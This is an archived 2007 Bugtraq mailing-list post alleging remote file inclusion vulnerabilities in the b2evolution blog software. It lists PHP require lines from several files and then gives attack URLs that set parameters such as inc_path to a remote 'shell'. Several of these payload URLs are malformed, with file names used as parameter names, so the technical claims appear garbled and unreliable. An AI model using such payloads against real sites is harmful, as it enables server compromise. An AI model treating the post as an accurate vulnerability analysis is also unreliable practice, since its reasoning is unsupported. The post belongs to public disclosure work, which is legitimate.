lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 25 Apr 2007 15:37:24 -0000
From: s433d_only_linux@...oo.de
To: bugtraq@...urityfocus.com
Subject: Remote File Inclusion

####################################################
# b2evolution         Remote File Inclusion        #
####################################################
Affected Software .:     b2evolution               #
Download..: http://b2evolution.net/                #
Risk ..............: high                          #
Date .........: 25/4/2007                          #
Found by ..........: s433d_only_linux              #
Contact ...........: s433d_only_linux@...oo.de     #
Web .............: Www.hackerz.ir                  #
special thanx ........... Ali Jasbi my beste friend#
####################################################

####################################################
Affected File:
b2evolution\blogs/a_noskin.php	require $inc_path.'_blog_main.inc.php';
b2evolution\blogs/a_stub.php	require $inc_path.'_blog_main.inc.php';
b2evolution\blogs/admin.php	require_once $inc_path.'_main.inc.php';
b2evolution\blogs/admin.php	require $view_path.'errors/_access_denied.inc.php';
b2evolution\blogs/admin.php	require_once $inc_path.'_async.inc.php';
b2evolution\blogs/admin.php	require $control_path.$ctrl_mappings[$ctrl];
b2evolution\blogs/contact.php	require_once $inc_path.'_main.inc.php';
b2evolution\blogs/contact.php	require $skins_path.'_msgform.php';
b2evolution\blogs/default.php	require_once $inc_path.'_main.inc.php';
b2evolution\blogs/index.php	require_once $inc_path.'_main.inc.php';
b2evolution\blogs/index.php	require $inc_path.'_blog_main.inc.php';
b2evolution\blogs/multiblogs.php	require_once $inc_path.'_blog_main.inc.php';
b2evolution\blogs/multiblogs.php	require $skins_path.'_bloglist.php';
b2evolution\blogs/multiblogs.php	require $skins_path.'_feedback.php';
######################################################
b2evolution\blogs/a_noskin.php?require=shell?
b2evolution\blogs/a_stub.php?_blog_main.inc.php=shell?
b2evolution\blogs/admin.php?inc_path=
b2evolution\blogs/admin.php?errors/_access_denied.inc.php=shell?
b2evolution\blogs/admin.php?inc_path=shell

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ